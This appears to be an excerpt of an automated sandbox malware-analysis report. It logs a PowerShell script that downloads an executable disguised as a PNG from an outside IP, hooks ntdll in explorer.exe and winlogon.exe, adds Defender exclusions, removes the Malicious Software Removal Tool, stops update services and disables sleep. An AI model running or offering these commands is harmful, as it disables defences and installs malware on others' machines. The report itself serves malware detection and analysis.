                                                  Dec 18, 2024 14:07:47.315382004 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.315426111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.316155910 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.316179037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.316222906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.316890001 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.316956997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.317004919 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.317883968 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.317898035 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.317934036 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.318600893 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.318620920 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.318670034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.319356918 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.319534063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.319596052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.320183992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.320363998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.320405960 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.321125031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.321152925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.321199894 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.322202921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:47.362688065 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:47.641798973 CET4970780192.168.2.8176.113.115.178

                                                  HTTP Request Dependency Graph

                                                  • 176.113.115.178

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.849707176.113.115.178805328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 18, 2024 14:07:33.835376978 CET70OUTGET /M.png HTTP/1.1
                                                  Host: 176.113.115.178
                                                  Connection: Keep-Alive
                                                  Dec 18, 2024 14:07:35.287214994 CET1236INHTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "08ec05f1b18db1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 18 Dec 2024 13:07:35 GMT
                                                  Content-Length: 7679488
                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEd^ne"xT@u`USf "`"( SR@.rsrcfSR@.idata US@ 8US@ndryujmpp!`f!S@tnyudguu*u@.pdataI,u@@
                                                  Dec 18, 2024 14:07:35.287328959 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Dec 18, 2024 14:07:35.287461996 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Dec 18, 2024 14:07:35.287585974 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Dec 18, 2024 14:07:35.287600994 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Dec 18, 2024 14:07:35.287801981 CET1236INData Raw: 1f e5 1a 1b d0 cd c8 2f 83 44 69 46 aa fa be 19 20 10 1d 39 95 7f 0c 43 af 22 11 0f 98 23 4a 4d e8 a0 64 02 5c c9 61 c9 05 b8 91 44 0f f3 ca 06 dd 64 4a fe 82 a9 0f e4 10 96 93 74 7f 04 43 73 22 d5 0f f3 6a 81 a5 e8 64 64 c6 41 48 4e 9c 31 fd 55
                                                  Data Ascii: /DiF 9C"#JMd\aDdJtCs"jddAHN1U|?Fv{"=W*(Do{R?4$lA50]dNwV??L20 ZD!TO<-)8c.fuI)$Eh@\u
                                                  Dec 18, 2024 14:07:35.287815094 CET1236INData Raw: 53 41 c5 10 06 d5 01 c1 59 42 55 0b 89 4c 20 28 c8 f8 13 28 08 da 30 85 e8 4e b3 b1 15 12 55 91 29 c1 8d 4c 24 53 7e 61 13 0a 08 74 51 03 40 af f5 3d 27 ab c5 45 13 b5 66 0b 28 7d 02 6f 0b 0a 7d 59 33 20 40 33 f7 58 61 5d 43 1a f8 67 ba a2 d9 bf
                                                  Data Ascii: SAYBUL ((0NU)L$S~atQ@='Ef(}o}Y3 @3Xa]CgN<@4#RROdX=TiYr=VoKJ)GN!l%$z@I0O^PX\IH(F6*%BDQtr-I:SZMg'Lu50[qfSJ,
                                                  Dec 18, 2024 14:07:35.287992954 CET1236INData Raw: c3 9a d0 1c 05 a1 eb b0 44 56 68 49 8f 11 3a ca 32 a9 db cd b6 40 d0 b0 c0 10 f6 40 27 20 ec f2 99 94 2c 0d 1d ff 4a eb e8 9e 2e 30 53 df 39 34 99 46 1a 89 0d af 25 52 72 97 74 ba e0 c3 38 9c 8d 1a a2 1f c6 88 34 70 4c 1c 63 42 3c b2 6a 02 19 62
                                                  Data Ascii: DVhI:2@@' ,J.0S94F%Rrt84pLcB<jbC)ABeQMGHYoB4TIO<'pL`9tDvbrAs$UmVpR=HFz iK]5HS(PDx$EQP,(E9t&C4yD
                                                  Dec 18, 2024 14:07:35.288005114 CET1236INData Raw: 51 08 c4 00 6a 50 12 0c ed 1b f3 50 c6 d6 40 c4 fd c8 03 19 21 38 a8 62 88 54 20 bc 30 9e e9 68 9b 19 1f 0c b9 08 e8 55 7a a8 0a bd 49 2a 88 84 6b 39 83 2e 4b 1f 4a d2 c6 f0 99 18 16 09 09 97 e8 a3 e7 a4 0a 7a 58 44 99 0f 4b 28 30 22 48 81 c4 96
                                                  Data Ascii: QjPP@!8bT 0hUzI*k9.KJzXDK(0"H1[]kP!Y1w%fvA#TbZX`^Y(u<DFJ3j#8KVb$"ADW(UIP(YBPR@oYN)*}1p!BT4 C)PLFTmP
                                                  Dec 18, 2024 14:07:35.288017988 CET1236INData Raw: 61 59 79 85 41 b7 03 66 ad 37 2f fe 93 d1 14 52 e0 02 08 2d a4 1b 98 c2 7c 7a 42 6c 6c 94 14 ac be 80 c8 4b 4a 01 85 3d fb 80 35 92 08 0a 02 ad c0 e5 eb 20 b3 e0 66 42 b4 17 44 3b 02 0e 36 c7 95 60 22 9e f2 42 78 89 51 3c 59 e6 c4 b1 69 08 42 a1
                                                  Data Ascii: aYyAf7/R-|zBllKJ=5 fBD;6`"BxQ<YiB\u|=DxHLOU$!P3,#axi&nwg4gb#L$mb?y$h<DZ0H@#q[4F0KPwIL|#@8sg3-1
                                                  Dec 18, 2024 14:07:35.407617092 CET1236INData Raw: 34 92 1b f8 80 29 8d 14 c5 80 48 27 7c d1 6f 13 c6 b3 6a 59 0d b3 0b 85 b0 16 5b a2 8f 35 02 f3 8c 5c 8a 5d 6e 23 b7 b6 b2 47 d1 0e 2a 63 3e b5 b8 64 0f 6e 80 48 30 4c 16 88 a6 42 ca 14 98 4c e8 2d 6e e8 90 ad 6c 2c f8 a0 a1 13 8d 61 6b 9d 0f 4c
                                                  Data Ascii: 4)H'|ojY[5\]n#G*c>dnH0LBL-nl,akLAbtG9>DR`fOU\DPE"_j)u0;"9Edx03 &D%AFn1?JhkCQ[6YRR%("Pah%2mM+.I 8YCE?PDGt2AFaHv


                                                  Code Manipulations

                                                  User Modules

                                                  Hook Summary

                                                  Function NameHook TypeActive in Processes
                                                  ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                  NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                  ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                  NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                  ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                  NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                  NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                  ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                  ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                  NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                  RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                  NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                  NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                  ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                  ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                  Processes

                                                  Process: explorer.exe, Module: ntdll.dll
                                                  Function NameHook TypeNew Data
                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                  Process: winlogon.exe, Module: ntdll.dll
                                                  Function NameHook TypeNew Data
                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:07:14
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\GO.png.ps1"
                                                  Imagebase:0x7ff6cb6b0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:08:07:14
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:08:07:20
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
                                                  Imagebase:0x7ff6cb6b0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:08:07:46
                                                  Start date:18/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\LB311.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\LB311.exe"
                                                  Imagebase:0x7ff62e6f0000
                                                  File size:7'679'488 bytes
                                                  MD5 hash:C9E6AA21979D5FC710F1F2E8226D9DFE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 63%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:08:07:47
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                  Imagebase:0x7ff6cb6b0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:8
                                                  Start time:08:07:47
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff756de0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:13
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\wusa.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                  Imagebase:0x7ff6554f0000
                                                  File size:345'088 bytes
                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:14
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:08:07:49
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:19
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:20
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\sc.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                  Imagebase:0x7ff764e00000
                                                  File size:72'192 bytes
                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:21
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:22
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                  Imagebase:0x7ff61efe0000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:23
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                  Imagebase:0x7ff61efe0000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:24
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:25
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                  Imagebase:0x7ff61efe0000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:26
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\powercfg.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  Imagebase:0x7ff61efe0000
                                                  File size:96'256 bytes
                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:27
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:28
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\dialer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\dialer.exe
                                                  Imagebase:0x7ff64e2e0000
                                                  File size:39'936 bytes
                                                  MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:false

                                                  General

                                                  Target ID:29
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  General

                                                  Target ID:30
                                                  Start time:08:07:50
                                                  Start date:18/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
